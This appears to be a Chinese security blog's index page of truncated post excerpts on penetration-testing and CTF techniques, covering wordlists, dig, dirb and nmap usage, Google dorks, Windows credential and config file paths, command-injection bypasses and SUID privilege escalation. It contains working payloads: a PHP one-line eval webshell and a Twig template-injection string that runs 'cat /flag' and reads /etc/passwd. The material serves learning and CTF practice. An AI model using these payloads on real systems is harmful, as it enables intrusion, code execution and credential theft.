清风徐来

密码本wordlist简介1、wordlist简称单词表，也可叫密码字典，此工具包含了很多密码2、字典目录路径:/usr/share/wordlist/3、dirb （目录扫描）big.txt #大的字典small.txt #小的字典catala.txt #项目配置字典common.txt #公共字

子域名查找digdig命令说明查询DNS包括NS记录，A记录，MX记录等相关信息的工具。DNS 记录的类型说明类型A记录: A记录是指定域名对应的IP地址。类型AAAA记录：该记录是将域名解析到一个指定的IPV6的IP上类型CNAME记录：通常称别名解析。可以将注册的不同域名都转到一个域名记录上，由

dirb简介dirb是一个基于字典的web目录扫描工具，会用递归的方式来获取更多的目录，它还支持代理和http认证限制访问的网站参数格式：dirb <url_base> [<wordlist_file(s)>] [options]-a 设置user-agent-p <p

nmap常用命令nmap -sS -sV -p- xxx.xxx.xxx.xxxnmap -v -T4 -A xxx.xxx.xxx.xxxnmap -sT 192.168.96.4  //TCP连接扫描，不安全，慢nmap -sS 192.168.96.4  //SYN扫描,使用最频繁，安全，快n

谷歌语法intitle搜索关键词（intitle:variation）只搜索网页标题含有关键词的页面。inurl搜索关键词（intitle:variation）只搜索网页链接含有关键词的页面。intext搜索关键词（intext:variation）只搜索网页body标签中的文本含有关键词的页面。s

常见的敏感信息路径Windows系统c:\boot.ini // 查看系统版本c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件c:\windows\repair\sam // 存储Windows系统初次安装的密码c:\ProgramFiles\m

phptwig{{self.env.registerUndefinedFilterCallback("exec")}}{{self.env.getFilter("cat /flag")}}{{'/etc/passwd'|file_excerpt(1,30)}}

PHP一句话木马经典语句<?php @eval($_POST['cmd']);?>其中:(1) @ 为错误抑制符号(2) eval 执行php代码(3) $_POST['cmd'] 通过post接收的数据意思为eval把接受的数据当做php代码执行其他函数create_function

命令执行绕过拼接符号过滤在linux中，&和&&,|和||介绍如下： & 表示任务在后台执行，如要在后台运行redis-server,则有 redis-server & && 表示前一条命令执行成功时，才执行后一条命令 ，如 echo '1

suid提权Linux可执行文件包括： Nmap, Vim, find, Bash, More, Less, Nano, cp1、这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们，然后将所有错误重定向到/dev/null，从而仅列出该用户具有访问权限的那些二进制文件。fin